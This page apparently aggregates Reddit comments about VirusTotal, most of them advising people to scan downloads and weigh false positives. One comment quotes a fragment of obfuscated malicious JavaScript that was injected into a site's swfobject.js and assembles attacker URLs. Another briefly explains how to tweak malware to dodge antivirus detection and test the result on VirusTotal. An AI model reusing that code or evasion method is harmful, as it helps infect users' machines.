What is Reddit's opinion of
VirusTotal?
From 3.5 billion Reddit comments
100 reviews of this app found across Reddit:
Another thing is whenever you download ANYTHING, not just pirated media, you should scan it first with an antivirus that you trust before you open or execute it. It's a good habit to put into practice so that you don't accidentally end up having to reformat your whole computer because you didn't bother. This includes stuff from Google, Microsoft, Mozilla, etc.
Also, http://www.virustotal.com/ is a very handy website for exactly this sort of thing.
Here's a better online virus-scanner : http://www.virustotal.com/ (scans with about 20 up-to-date scanners including kaspersky)
Here's a DIY repair site to teach you how to repair everything: http://www.ifixit.com/
Here's a great Adobe After Effects tutorial site: http://www.videocopilot.net/tutorials/
Anyway, the list is fucking awesome!
Solved by using Hiren's BootCD:http://www.hirensbootcd.org/download/
Has a "BIOS Master Password Generator Collection of password generator tools to reset BIOS Power on Password / Admin password on Dell, Fujitsu Siemens, Compaq, Hewlett Packard, Phoenix and Samsung Laptops"
NOTE: I tried copying off the exe file of the tool from usb stick but my AV promptly removed it, stating it is a trojan horse.
Virustotal result: http://www.virustotal.com/file-scan/report.html?id=7a12455f194d01ec2f73c64413596b8f2554bf2150f2183ae67b5e4b93db0e7b-1299320224
From what I gather the executable is packed in a way to make decompilation difficult, this particular packing sets of a large number of Antivirus applications, including the one used at work, it is a false positive.
[](/solved)
It's not that it is incomplete, it is outdated advice from 5 years ago.
Today you will get compromised just by trying to read your local newspaper that had malicious javascript embedded into ads (happened here. Twice.) If it's not your local newspaper it's the WSJ, or pandora, or any of the number of sites that let anyone embed whatever code they want in their pages as part of advertisements.
I've seen people get compromised by drive by java exploits after clicking on the top result from a google search. The idea that people are safe if they just don't download things is completely false.
Oh, and even reddit has had this problem
Here is the virus total link from that event. 5 out of 41 anti-virus programs detected it.
To provide some extra insight to the article, anything running in RAM tends not to be obfuscated, even if the executable itself is packed or even encrypted (generally and simplistically speaking).
A common trick with malware analysis is to image the memory of a infected host with mdd (AFAIK mdd is a little more widely known than the WinDD of the article), use something like Volatility to extract the suspect malware executable from the memory image, and then do static analysis on that executable.
This is particularly useful for those who think they might be infected, but the AntiVirus (or whatever tool) isn't reporting an infection: Do the above steps and simply submit the extracted executable to a service like VirusTotal. Often times, you'll see antivirus software hit on the extracted executable from RAM, but not the executable on disk.
A few do's and don't that I follow while downloading anything -
As someone has mentioned, the safest source usually is the program's website.
If you are downloading from some other site, look at the program size that is indicated on the page. Once the download is about to start, check whether the download size indicated matches with what was displayed on the original page and that the file name is not something else.
Once download completes, always run a virus check on the file with the AV that you are using. It's also a good idea to check it on http://www.virustotal.com.
Is possible, run the installer on a Virtual Machine first.
During installation time, do not click on next buttons blindly but pay attention to what each page says. Uncheck the option to install any third party apps or crapware if the installer gives you that option.
Never ever download from a site that asks you to take a survey before allowing you to download.
Pay attention to the link that the download location points to. If it redirects to another domain, chances are that the link is not genuine.
Last but not the least, always google for the reviews about the product that you are about to download.
These are just a few steps I follow while downloading/installing any application. Not 100% foolproof, but takes care of majority of malware issues.
^[Edited ^because ^I ^mixed ^up ^bbCode ^with ^Markdown ^and ^messed ^up ^the ^formatting ^the ^first ^time. ^AG]
Hello,
If you open an elevated Command Prompt (filename: CMD.EXE) and issue a "DIR C:\HSCML.EXE /S /P" command, does it find a file named HSCML.EXE anywhere on Drive C:?
If so, try uploading that file to VirusTotal for scanning by ~40 different anti-malware programs and let us know what is reported back.
Regards,
Aryeh Goretsky
Seems you are correct. Found the proof over on the minecraft forums.
Thanks
UPDATE: There is new information that there is a potential threat.
Updated Virus Total: http://www.virustotal.com/file-scan/report.html?id=a81e22e91c831bf3d60569b6a1d9b0e9bab283e20be819da8117dcbb731e07a2-1298314780
I recieved this from a buddy of mine
> I have dug through the file and it is a downloader Trojan, now the plus side is it looks like it is only connecting to known virus sites so to stop the threat I suggest going and installing Spybot S&D -- http://www.safer-networking.org/en/download/
> Install and update this and then Immunize your system. This will blacklist all the downloader sites currently known, this blacklist does include the ones that the infected DLL file is trying to connect to.
> After that you can add an exception to your anti-virus and be in the clear. To be on the safe side I suggest you keep your Anti-Virus up to date, and I suggest using AVG since it has one of the best Resident Shields on the market for zero cost!
Tried it. No VirusTotal findings.
Proper interface. Does what it claims to do. And when you disable it, it automatically sets the clock based on a time server of your choosing.
Would download again :)
EDIT: I have to force-quit the program nearly half the time when it can't set the time using the chosen time-server. There seems to be no time-out in that function. But it's still a great tool. Use it while standing at your harvester outlet in single player! :D
It seems to be a virus from the future .. Are we role-playing Shin Megami Tensei? Can I be a Demon?
8/42 report viruses and they're all crappy AV. I think you need some better software.
Can you describe some characteristics of the infection?
Upload a sample to http://www.virustotal.com and paste the result.
Edit: Is this you? http://community.spiceworks.com/topic/158816-worm_downad-on-network
a comment from a user named acorn on the Krebs article:
*Searching the URL in Brian K’s graphic, shows detection eight months ago, and again 2 months ago:
Sophos denotes it as Troj/Invo-Zip (trojan)*
This looks really nice, a lot better than the other ones I've seen just for the simple fact it has the icons of the items. I shall be using this from now on! Thanks a lot :)
Virus scan for anyone who is suspicious: http://www.virustotal.com/file-scan/report.html?id=2da81d1370b9d9b7c5c371e9b793fab7a8f454957daa9c50c8a62ca9574992b6-1314960346
Virustotal scan comes up pretty much clean... even McAffee
A lot of AVs have poor heuristics and flag any executables that use a wrapper/packer (e.g. keygens, demos, trainers, etc..) even when they are perfectly harmless. Trainers also modify values in active memory which may have triggered the warning. Then again... maybe it actually have a Trojan but gamecopyworld is a pretty reliable source for cracked executables and trainers so I doubt it.
My antivirus software didn't show a virus on that page.
Avira, BitDefender, G-Data, Malc0de Database, ParetoLogic, Phishtank, TrendMicro and Websense ThreatSeeker also show that it doesn't have a virus:
http://www.virustotal.com/url-scan/report.html?id=f82eb3988f4b6c91128bc1c6ad17f5bd-1307037263
Virus Check:
The file looks clean. Here's the Virustotal report: http://www.virustotal.com/file-scan/report.html?id=29a0833c27cf152d8ca9e3e2e85792fe35be36874c268dc43aa0e3955a1caf43-1300174249
--
Comment on the download process:
Rapidshare makes it difficult for the end user to download files. I suspect many people gave up before they ever started downloading the file.
--
Comment on the software:
Why do you need 7 different seed numbers? Why not just a single one?
Also, for large files you can just submit a checksum hash of the file into the search box, if the file has already been uploaded by someone else you'll get a report for the file instantly without having to upload anything.
On windows I use a shell extension to generate the file hash.
> So I was thinking "I'll just boot up Linux through virtual machine everytime I wanna use the web".
This is really not necessary. I mean, it'll work.. but it's overkill. As long as you have an ad-blocker running and you're careful and use common sense when you download files, you'll be fine.
If you're not absolutely certain about a file you're downloading, upload it on http://www.virustotal.com before you attempt to run it.
Various anti-virus and anti-malware companies allow you to to submit suspicious files. You can find some places where you an submit via this search: https://www.google.com/search?q=submit+malware
You can't expect them to tell you how to fix your computer though. A submission will probably just cause their products to detect that malware in the future. They may also respond to you to tell you whether the file is malicious. It's best to do a full re-install using known-good sources.
A global hook isn't always bad. Various programs do legitimate things with it. However, if you have a program you can't identify doing global hooks, that is very suspicious.
First try scanning suspicious files via http://www.virustotal.com/. It automatically scans them using many different scanners. Even totally legitimate files can have false positives on a few though.
AVG's scan on virustotal didn't find anything:
Excuse the file name, compare it by the file checksums, it's the latest version of csgo.exe.
Virustotal says 14/16 online scanners report the website clean (+1 online scanner down, +1 online scanner not yet checked.)
I think it unlikely you've been infected; these kinds of sites seem to exist more to dovetail custom for collecting and selling drivers, manuals etc, which is useful - but it could easily not be.
Downloading stuff just because the battery is about to run out is not something to be encouraged -- don't tell n00bs that you did it and seemed to be okay.
Virustotal's result is a bit unsettling... If this is malware though, I have to give it to the developer. A game and a trojan all in 94kb!
It looks like a JSON encoding of comments, about 60K characters long. With out looking too deep, I'd call it a false positive related to links or other contents of some of the comments like the one reseph posted.
Contrary evidence? And more? And MORE?!
I shall take the risk... for science.
See how it Stacks up against other AV. Get some research malware and see what it detects and does not detect. It can be pretty easy, not even requiring you to install all of the AV products. With VirusTotal, you can scan a file with multiple AV products. Keep in mind that this isn't definitive (versions, settings, herustics, etc), as the Panda results on the site did not match my testing with their enterprise product. I have dealt with SEP (Symantec Endpoint Protection), which seems ok but far from perfect, but from what I remember, Norton was bloated and worthless. Not sure what the consensus nowadays is.
Hello,
Have you tried locating the files on the computer's hard disk drive and then uploading them to a service like VirusTotal to see if they are malicious?
Regards,
Aryeh Goretsky
no adress of the site owners or company, company has no logo, no sourcode available, only windows binary, domain created 1 month ago. not trustworthy at all!
but at least virus free...
Here's a list of virus scanners that detect the Windows Stability Center rogue antivirus.
A user would be in bigger trouble for having eicar on their machine than an actual virus. Eicar typically isn't downloaded unintentionally, and usually means someone is testing your AV.
Just had the same problem.
Dug around and found the installer in their official GitHub page. Bare in mind for this crypto, the ledger needs a stand alone app, not a chrome app. I have run it through VirusTotal and it yieled no virus threats. That and it's posted in Ledgers official github account. That was enough trust for me, so I've installed and had no issues transfering out some to it.
Anyone else verify if it's a trustworthy place? Someone who is using it for a while?
This is the Github page with downloads
edit: I found a working solution (at least for me). Downgrading Uplay to 17.0.0.4674 accourding to this steam post worked for me. http://steamcommunity.com/app/359550/discussions/0/412448792365217174/ >1. uninstall Uplay 2. download uplay 17.0.0.4674 form http://www.filehorse.com/download-uplay/24573/ and install it (no worries, it is safe) 3. open your Taskmanager, start uplay and kill it via taskmanager after the patch download started (DON'T LET IT FINISH) 4. now go to your "Ubisoft Game Launcher" Folder -> cache -> patch 5. rightklick on folder 4732 -> click "properties" 6. go to Security -> edit 7. for every user, make a hash under "deny" for "Change" From now on you can start Uplay in Online mode without it getting the Update 17.1 Build 4732, cause uplay can't access the folder. When a new Client Updates is released, it will be downloaded without problems.
I would advice you though to check the downloaded file with your antivirus app and http://www.virustotal.com
I played it a couple of years ago and it ran fine. IIRC the only problem I had was that I needed some mod to run it at my native 1920 resolution. The game doesn't appear to support newer higher resolutions past 1600 or so by default.
It was problably this one: http://blog.gib.me/2009/01/06/saints-row-2-resolution-editor/ (run it through http://www.virustotal.com/ just to be safe).
Guys, keep this in mind. Someone sends you a fishy link, or you just want to check websites/files for viruses?
I use VirusTotal and it works very well. Has detailed results and gets results from 40-50 different sites/programs.
Ok, uncheck the entry for chrome.exe as well under x11mod.
Also for good measure uncheck both TeamViewer service entries, then reboot.
Once you're logged back in, open http://www.virustotal.com and submit the chrome.exe and svchost.exe to it. (you can get to this folder by right-clicking in Autoruns and selecting "Jump to Image"..be sure not to run these files! I highly suspect they're part of a Trojan. You can also click Options/Scan Options in Autoruns and select the bottom three checkboxes to automatically run VirusTotal scans within the app).
After that, I would grab http://www.malwarebytes.org and run a full scan (I think it'll find some remnants to unrelated malware called Conduit or SearchProtect). As well as http://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe to detect and remove any rootkits. (Click "Change Parameters and check off the bottom three checkboxes)
Once you remove anything detected with those (if any). Let me know if you'd like help securing down your PC to prevent future compromise.
Sorry, I read that part and my brain must have stopped working just after. Anyways, here is a trick that might get you there (or any other site in case your browser is not working).
- Open the start menu and go to run (or press Windows + R on your keyboard)
- to get to VirusTotal, type the following command exactly:
> mshta http://www.virustotal.com
EDIT: There is no address bar in mshta for you to copy the link from. No worries.Go to the "File Detail" tab in VirusTotal and copy the MD5, then paste it here and I'll paste the link for you.
All that said, you should post support topics in another subreddit, this one is for malware related articles/information, not for removal help.
Hello,
Given the random name, it is probably malware of some form.
Try right-clicking on the entry for it in the Task Manager, selecting 'Open File Location' to open the directory that it is in, and then uploading the file to Virus Total to receive a report on it from about four dozen different anti-malware programs.
Regards,
Aryeh Goretsky
http://windows.microsoft.com/en-us/windows/security-essentials-download
Windows 8 has them built-in, and this is the standard recommendation for W7.
There are other free solutions available, though, for example Avira:
http://www.avira.com/en/avira-free-antivirus
I use MSE (W8). If I have a special case that I want to know about, I send it to http://www.virustotal.com (40+ scanners)
If you download a binary (suitable for your system), you can run it right away (or install and then run).
If you download source code, you could theoretically compile it to a binary and run it, or run it in the IDE where you compile it. But compiling source is usually an endeavour with obstacles.
Another difference: If you run compiled source code, you - theoretically - know exactly what you're running there. Running a downloaded binary could do stuff that you don't want to, see e.g. all the 3letteragency backdoors we have these days, but those are usually even in the source code, they are just well hidden. This is all very theoretical. The rule to go for normal users is: Download the binary for your system. If you don't trust it because of viruses, check it on http://www.virustotal.com, but in most cases you're fine. If the download location was proper, I mean. Don't expect a shady application that only like 10,000 people on the Web download to be definitely pure.
Hello,
Try uploading the PDF file to a multi-scan engine like Google's VirusTotal, which will scan it with a battery of several dozen anti-malware programs.
Regards,
Aryeh Goretsky
Yeah, it'd probably throw up a lot of red flags as well if you ran it through a multi-antivirus and file analyzer like VirusTotal. I haven't done so myself because I'm paranoid I'll somehow launch the file by mistake.
I think it's cool to see the community coming together to protect people from a common threat. Thanks for being a part of that. :)
There are thousands of ways to get infected, most of which can be avoided with common sense. If someone sends you www.battlefield.freehost1.com/game.exe and tells you it's a crack for battlefield there is a very good chance it's not.
If someone tells you they have some kind of software that does something that seems unbelievable such as a paypal cash generator or xbox live points hacker and they try to send it to you tell them to fuck themselves (or don't attempt to hack them back)
Oh I forgot GUYS IF YOU EVER GET SENT OR FIND A SUSS FILE SCAN IT HERE: http://www.novirusthanks.org/service/multi-engine-antivirus-scanner/
OR
Thanks! Virustotal reports it clean. http://www.virustotal.com/file-scan/report.html?id=bc1a96c76f7dcfa73325a7a4b3024b4c636dd58598d91d92f4c737f8d2117999-1313959358
Good point
I'm on the 1994 San Marino GP (http://www.classicgrandprixclub.com/Grand-Prix/03-San-Marino-gp-1994) but there isn't anything there except 5 "download" and "play" adverts that try to get me to download XVid codecs that are full of malware
Does it show your address or last few digits of a card?
All the ones I have seen similar to this have been frauds trying to get you to download a trojan or similar (in this case zip file contains invoice.exe and putting in the URL into http://www.virustotal.com says Malware site on a couple of checkers)
how do I know they couldn't be genuine - they never come to an email address they could have linked to my card details.
I'd say they have harvested your name and email address from some site and just sent a spam
It does contain opencandy adware, but only MSE and NOD32 consider opencandy a threat.
If you scroll to the bottom of the EULA, they state it plainly: >OPENCANDY
>OpenCandy End User License Agreement >January 26, 2010
>This installer uses the OpenCandy network to recommend other software you may find valuable during the installation of this software. OpenCandy collects NON-personally identifiable information about this installation and the recommendation process. Collection of this information ONLY occurs during this installation and the recommendation process; in accordance with OpenCandy's Privacy Policy, available at www.opencandy.com/privacy-policy
Downvoted, reported, called the cops, hit the gym.
Edit: Oh, and it's a virus.
Another person thinks this is malware:
https://bitcointalk.org/index.php?topic=36218.msg446375#msg446375
Also:
Edit1: Two guys on the bitcointalk.org forum skimmed through the source code and say there are very few changes and that they found nothing malicious about it. So at least it doesn't seem to try to steal your wallet or install malware. Probably just an attempt from one individual to be a very early adopter. He started mining quite a bit before announcing this fork.
awesome. So this file's been uploaded before, I imagine that happens a lot... and this is the result:
2 guys out of 19 say it's malware. So I'm still to assume it's probably safe, I guess...
Could be a false positive. VirusTotal seems really generic with everything.
https://rapidshare.com/files/1491257191/Battlefield_Heroes_Beta__550k_users_.rar is the url i've been pointed to.
its a list of username / hashes as a csv with 548774 lines.
edit: -and as its a rar, here's what virustotal says
Quite possibly. What is the block of code at the end of http://www.focuspointstudios.com/ads/swfobject.js , starting with "this.l=18257;this.l--;this.p=43988"? It does not seem to be a part of swfobject.js version 1.4.4. VirusTotal certainly doesn't like it.
Edit: It has shit like this in it, constructing URLs from pieces and substrings var a = String("5I6Whttp".substr(4) + "://aN70".substr(0, 4) + "shdo" + "g.ru" + ":"); this.Fj = ""; var Z = 500385 - 492305; var Fc = ["LJ", "jN", "tV"]; var _H = "/gbRp".substr(0, 2) + "oo" + "gl" + "e." + "TeZco".substr(3) + "m/" + "fi" + "sh" + "ki" + ".nu2q".substr(0, 2) + "et" + "fOBX/p".substr(4) + "eokJBy".substr(0, 2) + "PALrplrLAP".substr(4, 2) + "e." + "co" + "m." + "cnO1l".substr(0, 2) + ".pAXJ".substr(0, 2) + "vUuhp".substr(3);
What antivirus are you using? I can't get a single red flag from any of them.
DVORAK! then your Z key wont work(if you stayed on dvorak). I use a program called Dvorak Assistant you can double click the tray icon to swap back andforth between keyboard layouts. If you dont trust the program upload it to VirusTotal for a scan to prove its safe :)
(?/ key in dvorak is where the [{ key is on qwerty)
Looks good just downloaded about to go play with it because I want to build a city. Anyways for anyone interested VirusTotal Report here tl;dr Perfectly clean
All current Anti Virus software leaves you unprotected...
Something like 40 different Virus scanning engines. Any time I get a hit from my daily virus scan, I use virus total to check to see if it looks like a false positive.
Also, I haven't had a chance to check it out much, but academicearth.org looks promising.
There are a few. Most antivirus company sites have this.
And check this one that you can also submit a download link to be checked before downloading. http://www.virustotal.com
I think a good piece of advice would be for people to avoid visiting AQ related websites. With that said.. it doesn't appear the file from 2009 they're referencing is at all malicious. No AV hits (years later) and additional analysis indicate it's just a regular document.
Wow, that's trust. After 13 hours, no one has send this thing to VirusTotal.com yet.
Results: None. (As expected.)
This might be interesting then: http://www.clamwin.com/
And you could disable the "active protection" features of both AVs I mentioned.
If your really want to manually scan files I can advise http://www.virustotal.com
If you have a URL, you can enter that URL into VirusTotal and it will scan the content for you - but be aware that whatever is retrieved/found will be shared with various other orgs, so do not use it for private/confidential data.
>Of course I click block.
Have you ever heard of a tech guy ask "Operator error?"
Norton is not a software I would recommend to any person for any reason, for any computer. It's just... no. In fact, I'm one of the few Windows users who refuses to put any antivirus on the laptop. One day I decided to stop buying into the hype that my computer would get overrun with viruses if I didn't have the antivirus.
Most interestingly out of that experiement is the number of malware softwards that STOPPED showing up in my computer after removing MalwareBytes!
But then, I'm also careful about the things I put on and use VirusTotal to help show whether or not the software has malware in it.
It is highly possible that your issues of Norton + Mac are causing problems. Did you do a review to see how well other people have usage experience of Norton on their Mac? Did you do a review of this type of problem happening outside of having antivirus on a Mac?
These are the first couple questions that come to mind when seeing Norton software on any computer.
Check this out, it will guide you through the process,
Regarding your query, you must have landed on an advertisement site which your browser flagged
You can always test the apks on www.virustotal.com for any virus/malware/adware.
Also I can assure you that all the mods are tested on Virus Total before uploading.
If you still have any query contact us at Our official group
Thank you!
If malwarebites has quarantined it, you should be fine. If you are still worried, make sure to check what launches on startup (Settings > Apps > Startup) and make sure the app isn't there.
You hit "No" when asked if it could make changes, so if it was a virus, it couldn't do much.
If you want, you can use Virus Total to search websites/files to check for viruses/phishing attacks/malware
Before you install risky APKS scan them with; virustotal (http://www.virustotal.com). It will inform you about malware (virus, trojans, worms) and allows you to upload any unknown applications to Virustotal. In other words, will get your applications scanned by more than 50 antivirus, flagging any undesired content.
You've caught my attention. What kind of file? Can you upload the file to http://www.virustotal.com and post the results as a reply?
You can also use some of the SysInternal Suite Tools
It's really recommended, although your advice is good. Most of the scripts from Aveyo are very very interesting and if any of them were loaded with any malware or suspicious activity it would've been long time since Pastebin would've closed him.
Also, if it's any good, Virustotal upload of the script.
Upload the clientrunner.exe to Virustotal.com and check the results. If the vast majority of repors say its clean, its most likely clean.
One or two false positivies dont mean much, as others have already told you.
If I'm correct, the file is only 9,4MB. Simply go to http://www.virustotal.com, upload it and have it scanned by 30 odd different anti-virus programs. Depending on the outcome, make an informed decision.
I don't know F-Secure and have never used it. I think it's just stating that it has not often encountered this file and thus doesn't have much info on it. Being cautious is great, being paranoid is not!
Also check the MD5 checksum.
Nope, you can use a mod for it though. Alternativlely, there are a ton of good trainers/cheat tables out there for D1, and it's very easy to use/find. It'a a single player game, so i'm assuming the encouraging of cheating is allowed.
I would use virus total if you do decide to download any trainers/mod menus, can't detect everything but it can detect a lot.
Hello,
Try uploading the file to VirusTotal, a multi-engine scanning service run by Google.
If any of the anti-malware programs there detect it, use one of them to remove it from your system.
Regards,
Aryeh Goretsky
My workflow is this one:
- Having these Folder Actions. If I see a notification about a new item on this folders and I'm not installing anything, I immediately read the plist created (there's no harm in doing this, it's just a text file and I look for the PATH of the file that executes the potential threat.
- When I have the PATH I open the folder containing the "possible threat" and I upload it to http://www.virustotal.com
- If any of the anti-viruses detects it as malware, I delete the .plist and the binary linked.
- If not, I search the name of the file. If there's a harmless daemon or agent, there will be plenty of websites talking about it. If nothing pops up.. delete.
If you can locate the infected file, run it through VirusTotal - you'll get results from dozens of antivirus companies and you'll be able to determine if it's a false positive.
In addition, look up the file name and how it relates to Google Drive - maybe it was planted there and should be removed. Same regarding the hidden folder (unless you created it yourself)
Edit: link format
First, keep OS and apps updated.
If you must use Flash, use some way to turn it off by default and only turn it on at some sites where you need it. Firefox has this built in.
Don't keep any other browser plugins needlessly enabled.
Think before running anything you download. Using some good anti-virus and anti-malware software helps, but cannot serve as a replacement for the user's brain. If you're suspicious about something, you can submit it to http://www.virustotal.com/ which scans it with lots of different scanners, but even that is not a guarantee.
Hello,
You might want to archive the file (.7Z, .RAR, .ZIP, etc.) and upload it to Google's VirusTotal multi-scanning engine to see what it reports, if anything.
Regards,
Aryeh Goretsky
this has been the issue as long as i can remember since 1.6 it has never been improved.. All the 3rd party tools have VIRUSES like this one http://csgo-demos-manager.com/
scan it on http://www.virustotal.com if you don't believe me
the latter. do you honestly think, that files which contain code to alter your gameplay are impossible to hold a virus because of their size? the smallest known viruses are just several bytes long. bytes. that's without a k.
virustotal.com is well respected website for filechecking, using over fifty known anti-virus applications, not just "your average virus scanner".
Eh - this would be more useful if you already had the hashes. You can grab some Poison Ivy hashes from this writeup - the writeup might be informative for the students as well.
https://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf
If Malwarebytes "said" it removed the trojan, then the trojan got removed from your computer :) You should always scan the cache folder with Malwarebytes after you download software from torrents, you should also submit all downloaded .exe and .zip and .rar files to http://www.virustotal.com/ (it scans the files with 60+ Antivirus software)
You made some good points and questions, I can only share my experience and tips about using VPNs and torrents, the safe way: 1) use Google Public DNS (to override your ISP DNSs and to not be spied by your ISP) 2) use a VPN like TorGuard that allows torrents http://www.unbloock.com/torrent-p2p-vpn/ 3) use a safe torrent client, like uTorrent http://www.majorgeeks.com/files/details/utorrent.html 4) if you download applications or software, scan them with http://www.virustotal.com/ always 5) download torrent files from trusted sites. Hope you have found the information useful.
Hello,
Try uploading the file to VirusTotal which is a free service operated by Google. It will then run a battery of anti-malware programs against it and let you know the results.
Also, give your anti-malware vendor's technical support department a call, explain what happened and ask them to walk you through checking the computer for new, undetected malware.
Regards,
Aryeh Goretsky
Statistically speaking, sites like Pornhub and RedTube are safer than your average site simply because they have to be. It's the ads on the side that are dangerous.
As for TPB, just use VirusTotal.
> n
hej pal, should be an false alarm.
i use qihoo 360 IS and get false alarms with prison architect, sometimes tf2.. i think the companys (AVs) are sometimes not as fast as they should.
you could upload the exe to virustotal.com
The good viruses aren't going to show any effects on screen. The bad ones will just show toolbars and browser hijackers.
Check out VirusTotal, Anubis, and Malwr. The latter shows some screenshots of the virus as it runs in a VM.
Alternately, you could just fire up your own VM, snapshot it, and then start downloading viruses and malware.
For any file under 128MB, you can run it in VirusTotal (http://www.virustotal.com). Once you download the file, open the folder location (before you open the file itself), and then drag it directly to virustotal (or browse for the file). It'll use like over 50 different anti-virus systems to check the file for a virus. Also, if the file has been scanned already (by other downloaders), it'll show you the previous scan results. Usually, music albums and movies will be too big to scan, so I mean in that case honestly I would go by the torrents history...(and having a good anti-virus program)....but many program and applications that I download, for example, are less than 128mb, VirusTotal is a gem for double checking them!
I use Virus Total as much as possible, it's pretty comforting in situations that you feel rather eerie about.
Also, building on others side, download from "verified" torrent uploaders...on pirate bay they'll have a colored skull icon next to their name. If it's Green, they have "VIP" status, Pink means they're "trusted," and blue means "helper." (There's some info about it here: https://forum.suprbay.org/Thread-ThePirateBay-Want-Trusted-VIP-Status-Pink-Green-Skull-See-Here -- couldn't find much else, but I'm sure you can look it up more extensively if you need to.
On Kickass, a verified uploader is someone that has crown next to their name. Reading comments helps, as well. If you ever see a torrent has many good comments a just a couple of bad ones, I would recommend checking out the user history of the bad commenters, some times its spam or just people being jerkoffs.
a portable EXE might write to the registry, that is somewhat normal. (a true portable app leaves no traces behind or entries in the registry).
might try uploading the EXE to http://www.virustotal.com/
Of course providing info on the EXE also might help us help you.
A wiser person wouldn't run a mysterious EXE to "see what it was."
Hello,
You could upload the various files you suspect to various websites like [VirusTotal](http://www.virustotal.com/], Metascan and Anubis and post the links.
You might also want to consider putting an archive of the files up for people to download, whether it be from Reddit or your anti-malware vendor's technical support department.
There are a lot of different anti-malware programs out there which detect all sorts of threats, possibly including whatever might be affecting your computer. Some of them are free for individual use (Avast!, AVG, Avira, ClamWin, Comodo, Immunet, Microsoft, Panda, Qihoo 360, etc.) while others must be licensed (BitDefender, ESET, F-Secure, G-Data, K7, Kaspersky, McAfee, Sophos, Symantec, Trend Micro, Vipre, etc.). However, even the paid ones typically offer evaluation versions for a month or so, and that includes tech support as well. So, pick a vendor, install their software, see what it finds, and call their tech support and go from there.
Regards,
Aryeh Goretsky
If you're a good malware developer, make your own. If you're not, download one from a trusted source and twist the code so that it does the same but the checksum is different. Just changing a couple of letters will hide it from various AVs, but the more you twist it the more AVs you will bypass.
Check the file with a service like virustotal to see which AVs you can bypass and which ones you can't.
There are a lot of detection methods used by AVs, and therefore there are also lots of bypassing methods used by malware developers. It's hard to make a resume of the different ways of doing it :/ Sorry!
>I got one hit from TDSSKiller. It was /Device/Harddisk0/DR0. Can anyone explain what that is?
Could be a rootkit, could be absolutely nothing. You'll have to dump your MBR manually using the standalone MBR.exe file from GMER. http://www.gmer.net/
Download and extract it. Then type the following in to a command prompt.
mbr -c 0 1 mbr.bin
Then upload that mbr.bin file to http://www.virustotal.com for checking.
>When I run RKill, it kills a process called rundll32.exe in my SysWoW folder. Is this bad? If so, how do I get rid of it?
Yeah, that's bad. It should NOT Be in that folder.
What was the result of the Combofix run after running rkill? Did it finish? Did it give you a log file?
You probably have the Bamital.Q Trojan. If you were to upload your winlogon.exe and Explorer.exe to VirusTotal, you may also find that they are infected. If this is the case, your best bet on removing it is to use Microsoft safety Scanner. Run a full scan on your C:\ drive, reboot, and then run MalwareBytes' Anti-Malware with a full scan on your C:\ drive. After that you should be all set without having to reformat.
Man I clicked on that .gif way before I saw this thread. Nothing happened to me. I just can't believe it came from that image. I downloaded the image and ran it through http://www.virustotal.com and nothing popped up.
Maybe you had a virus/root kit just waiting for you to hit ESC.
Just because someone cries Wolf, doesn't mean there is one
The following all rate your site as clean:
Avira Clean site
BitDefender Clean site
Firefox Clean site
G-Data Clean site
Google Safebrowsing Clean site
MalwareDomainList Clean site
Opera Clean site
ParetoLogic Clean site
Phishtank Clean site
TrendMicro Clean site
Websense ThreatSeeker Clean site
Wepawet Clean site
(From VirusTotal.com).
It's safe. Don't just take my word for it though, you can download it and check it up on an online virus scanner. Go to the link below to look at the results when I scanned it.
stop overreacting bro/girl. It's probably because your media player doesn't know how to handle foreign file names and it hasn't released control over the file, hence the difficulty deleting it.
Either way, look at this. Boom, QED.
downloading a rar file will not hurt your system. just remember to open the file in your virtual machine or your test machine if you find it suspicious. Or use this to scan the file online
Avoiding a virus is common sense, you don't need an anti-virus program.
- The most common way to get a virus is from an executable file; all of them labeled with the .exe extension tag. Viruses are programs that you open.
- If you must open a program that has little to no credibility, has reviews screaming of a virus, or seems too good to be true - for some reason or another (cheats, torrented stuff, porn, etc) - then scan it first using VirusTotal or other credible online scanners. They use multiple anti-virus programs, not just the shitty one sitting on your computer.
~~Note~~ *I tried to make this short and simple, I loathe anti-viruses (I keep my firewall on and update my stuff, so I don't get hit by real hackers). I didn't talk about a lot of other stuff, I know.
What file was it. That information would greatly increase the chances of figuring out what it is. If you still have the file, send it through VirusTotal.com and it should tell you what is on the file.
Strange, considering that McAffee is one of the few that doesn't seem to mark it as containing a trojan on virustotal.